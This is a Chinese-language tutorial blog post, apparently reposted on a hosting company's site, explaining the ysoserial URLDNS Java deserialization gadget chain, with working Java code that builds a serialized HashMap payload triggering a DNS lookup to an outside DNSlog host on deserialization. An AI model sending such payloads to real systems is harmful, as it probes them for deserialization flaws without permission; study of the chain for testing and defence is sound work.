189 8069 5689

URLDNS链-创新互联

听说这个链子是最简单的链子之一了,但是却是来来回回看了好多遍才勉强看明白。

成都创新互联公司2013年至今,先为林甸等服务建站,林甸等地企业,进行企业商务咨询服务。为林甸企业网站制作PC+手机+微官网三网同步一站式服务解决您的所有建站问题。

在 ysoserial 中我们可以看见链子是这样的:

*Gadget Chain:

* HashMap.readObject()

* HashMap.putVal()

* HashMap.hash()

* URL.hashCode()

简单流程:

1.HashMap接收一个类O(URL类)

2.类O(URL类)的hashCode()后续的一串链子可以发起DNS请求

3.HashMap的readObject刚好可以调用O.hashCode();

现在我们来编写类来观察如何触发DNS请求

package packet1;

import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;

public class SerializeTest{
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }

    public static void main(String[] args) throws Exception {
        HashMaphashmap = new HashMap();
        URL url = new URL("http://25d13c3b.dns.1433.eu.org");
        Classclazz = url.getClass();
        hashmap.put(url, 1);
        serialize(hashmap);
    }
}

这个类可以进行序列化,按照正常来说序列化的过程是不会进行DNS请求的,但是我们查看DNSlog平台:

发现序列化的时候就发起请求了,这样有几个非常不好的地方:

  1. 影响我们判断是否有URLDNS这个漏洞存在(因为我们是想要反序列化的时候触发)
  2. 最重要的是其实在序列化之后URL类里面的hashCode已经被改变了,反序列化的时候并不会触发

下图是URL类中的hashCode()方法;

这里只有当hashCode不为负一的时候才会走handler发起DNS请求

hashCode在初始化的时候已经被赋值成-1了:

但是我们序列化之后值已经被改变成为handler.hashCode了

那么就有一个疑问,序列化的时候是怎么触发的?

我们跟进put:

发现会调用hash函数。跟进hash:

发现调用handler,并且此时hashCode的值被改变

跟进hashcode:

调用getProtocol(),调用getHost():

其他更细节的我就没跟进,但是我们需要知道调用URL的hashCode()之后,并且hashCode的值不为-1就会发起DNS请求。所以我们可以通过反射技术来改变值,以此来达到序列化的时候不进行DNS请求,但是反序列化的时候会进行DNS请求

所以让我们来改进代码:

序列化代码:

package packet1;

import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;

public class SerializeTest{
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }

    public static void main(String[] args) throws Exception {
        HashMaphashmap = new HashMap();
        URL url = new URL("http://25d13c3b.dns.1433.eu.org");
        Classclazz = url.getClass();
        Field field = clazz.getDeclaredField("hashCode");
        field.setAccessible(true);
        field.set(url, 1234);
        hashmap.put(url, 1);
        field.set(url, -1);
        serialize(hashmap);
    }
}

在put之前我们改变url的hashCode值不为-1,put之后我们把url的hashCode改为-1,之后再对hashmap进行序列化。

反序列化代码:

package packet1;

import java.io.FileInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;

public class UnSerializeTest {
    public static Object unSerialize(String Filename) throws IOException , ClassNotFoundException{
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }

    public static void main(String[] args) throws IOException, ClassNotFoundException {
        unSerialize("ser.bin");
    }
}

经过测试之后,序列化的时候不会发起DNS请求,反序列化之后可以发起DNS请求.

你是否还在寻找稳定的海外服务器提供商?创新互联www.cdcxhl.cn海外机房具备T级流量清洗系统配攻击溯源,准确流量调度确保服务器高可用性,企业级服务器适合批量采购,新人活动首月15元起,快前往官网查看详情吧


当前名称:URLDNS链-创新互联
文章起源:http://cdxtjz.cn/article/hgphe.html

其他资讯